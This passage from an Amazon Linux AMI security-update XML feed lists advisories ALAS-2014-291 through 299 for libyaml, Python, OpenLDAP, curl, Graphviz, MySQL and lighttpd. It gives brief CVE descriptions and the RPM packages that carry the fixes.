arch="i686"><filename>Packages/ruby19-devel-1.9.3.545-32.60.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.60.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-291</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-291: important priority package update for libyaml</title><issued date="2014-02-26 14:27:00" /><updated date="2014-09-16 22:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6393:
The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow.
1033990:
CVE-2013-6393 libyaml: heap-based buffer overflow when parsing YAML tags
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393" title="" id="CVE-2013-6393" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml-debuginfo" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.4" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.4-6.5.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.4-6.5.amzn1.i686.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.4-6.5.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.4" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.4-6.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-292</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-292: medium priority package update for python26</title><issued date="2014-02-26 14:28:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1912:
1062370:
CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912" title="" id="CVE-2014-1912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-devel" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-1.43.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" 
release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-1.43.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-293</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-293: medium priority package update for python27</title><issued date="2014-02-26 14:28:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1912:
1062370:
CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912" title="" id="CVE-2014-1912" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.5" release="11.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-11.32.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-libs" 
version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-11.32.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="11.32.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-11.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-294</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-294: medium priority package update for openldap</title><issued date="2014-02-26 16:22:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4449:
The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not properly count references, which allows remote attackers to cause a denial of service (slapd crash) by unbinding immediately after a search request, which triggers rwm_conn_destroy to free the session context while it is being used by rwm_op_search.
1019490:
CVE-2013-4449 openldap: segfault on certain queries with rwm overlay
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4449" title="" id="CVE-2013-4449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-servers" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-34.23.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="34.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/openldap-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-34.23.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.23.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-34.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-295</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-295: medium priority package update for curl</title><issued date="2014-02-26 16:51:00" /><updated date="2014-09-16 22:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0015:
cURL and libcurl 7.10.6 through 7.34.0, when more than one authentication method is enabled, re-uses NTLM connections, which might allow context-dependent attackers to authenticate as other users via a request.
1053903:
CVE-2014-0015 curl: re-use of wrong HTTP NTLM connection in libcurl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015" title="" id="CVE-2014-0015" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.35.0-2.42.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.35.0-2.42.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.35.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.35.0-2.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-296</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-296: medium priority package update for graphviz</title><issued date="2014-03-06 14:55:00" /><updated date="2014-09-16 22:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2014-1236:
Stack-based buffer overflow in the chkNum function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via vectors related to a "badly formed number" and a "long digit list."
1050872:
CVE-2014-1236 graphviz: buffer overflow vulnerability
CVE-2014-1235:
1050871:
CVE-2014-1235 graphviz: buffer overflow in yyerror() due to improper fix for CVE-2014-0978
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1235" title="" id="CVE-2014-1235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1236" title="" id="CVE-2014-1236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-guile" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="12.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/graphviz-java-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="12.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.30.1-12.39.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-lua-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-java" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-java-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-python" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.30.1" release="12.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/graphviz-guile-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-tcl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-tcl-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-gd" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-gd-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-doc" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-doc-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-graphs" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-graphs-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-devel" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-devel-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-debuginfo" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-debuginfo-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.30.1-12.39.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.30.1" release="12.39.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-R-2.30.1-12.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-297</id><title>Amazon 
Linux AMI 2012.09 - ALAS-2014-297: medium priority package update for graphviz-php</title><issued date="2014-03-06 14:55:00" /><updated date="2014-09-16 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1236:
Stack-based buffer overflow in the chkNum function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via vectors related to a "badly formed number" and a "long digit list."
1050872:
CVE-2014-1236 graphviz: buffer overflow vulnerability
CVE-2014-1235:
1050871:
CVE-2014-1235 graphviz: buffer overflow in yyerror() due to improper fix for CVE-2014-0978
CVE-2014-0978:
Stack-based buffer overflow in the yyerror function in lib/cgraph/scan.l in Graphviz 2.34.0 allows remote attackers to have unspecified impact via a long line in a dot file.
1049165:
CVE-2014-0978 graphviz: stack-based buffer overflow in yyerror()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0978" title="" id="CVE-2014-0978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1235" title="" id="CVE-2014-1235" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1236" title="" id="CVE-2014-1236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-php" version="2.30.1" release="12.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php-2.30.1-12.37.amzn1.x86_64.rpm</filename></package><package name="graphviz-php" version="2.30.1" release="12.37.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php-2.30.1-12.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-298</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-298: medium priority package update for mysql51</title><issued date="2014-03-06 14:56:00" /><updated date="2014-09-16 22:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0437:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0412:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0402:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0401:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0393:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0386:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2014-0001:
A buffer overflow flaw was found in the way the MySQL command line client tool (mysql) processed excessively long version strings. If a user connected to a malicious MySQL server via the mysql client, the server could use this flaw to crash the mysql client or, potentially, execute arbitrary code as the user running the mysql client.
CVE-2013-5908:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5908" title="" id="CVE-2013-5908" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0001" title="" id="CVE-2014-0001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0386" title="" id="CVE-2014-0386" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0393" title="" id="CVE-2014-0393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0401" title="" id="CVE-2014-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0402" title="" id="CVE-2014-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0412" title="" id="CVE-2014-0412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0437" title="" id="CVE-2014-0437" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0164.html" title="" id="RHSA-2014:0164" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-server" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="3.68.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.73" release="3.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.73-3.68.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.73-3.68.amzn1.i686.rpm</filename></package><package 
name="mysql51-debuginfo" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.73-3.68.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.73" release="3.68.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.73-3.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-299</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-299: medium priority package update for lighttpd</title><issued date="2014-03-06 14:57:00" /><updated date="2014-09-16 22:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4560:
Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures.
1029664:
CVE-2013-4560 lighttpd: Use after free if FAMMonitorDirectory fails
CVE-2013-4559:
lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.
1029663:
CVE-2013-4559 lighttpd: setuid/setgid/setgroups return value check
CVE-2013-4508:
lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network.
1026566:
CVE-2013-4508 lighttpd: uses vulnerable cipher suites when SNI is used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4508" title="" id="CVE-2013-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4559" title="" id="CVE-2013-4559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4560" title="" id="CVE-2013-4560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-fastcgi" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.34" release="4.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.34-4.12.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.34" release="4.12.amzn1" epoch="0" 